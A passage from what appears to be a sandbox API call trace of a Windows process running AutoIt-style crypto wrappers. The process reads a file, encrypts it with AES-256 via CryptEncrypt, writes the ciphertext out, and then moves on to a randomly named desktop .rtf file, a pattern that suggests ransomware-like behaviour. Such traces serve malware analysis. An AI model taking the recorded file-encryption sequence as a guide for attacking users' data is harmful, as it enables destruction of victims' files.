hHeap=0x1780000) returned 1 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0119.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0119.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0119.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0119.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0119.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0119.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0119.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0119.628] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0119.628] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x22f8, lpOverlapped=0x0) returned 1 [0119.629] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0119.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0119.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0119.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22f8) returned 0x43fb458 [0119.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22f8) returned 0x4516010 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb458 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0119.632] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0119.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22f8) returned 0x43fb458 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb458 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0119.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.633] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0119.633] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0119.633] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22f8) returned 0x43fb458 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0119.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22f8) returned 0x4518310 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0119.635] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.635] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0119.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.635] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.636] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0119.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0119.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0119.637] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0119.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0119.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0119.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0119.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0119.637] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e2780, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2780*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0119.637] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0119.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0119.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caac0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0119.654] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x22f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x2300) returned 1 [0119.654] CharLowerBuffW (in: lpsz="byte[8961]", cchLength=0xa | out: lpsz="byte[8961]") returned 0xa [0119.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0119.654] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x451a610*, pdwDataLen=0x144e790*=0x22f8, dwBufLen=0x2300 | out: pbData=0x451a610*, pdwDataLen=0x144e790*=0x2300) returned 1 [0119.654] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.654] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x2300, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x2300, lpOverlapped=0x0) returned 1 [0119.656] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0119.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0119.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0119.656] CryptDestroyKey (hKey=0x41ac100) returned 1 [0119.656] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.656] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.657] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0119.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0119.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0119.657] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0119.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.657] FreeLibrary (hLibModule=0x756e0000) returned 1 [0119.657] CloseHandle (hObject=0x2a0) returned 1 [0119.657] CloseHandle (hObject=0x258) returned 1 [0119.658] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf", nBufferLength=0x7fff, 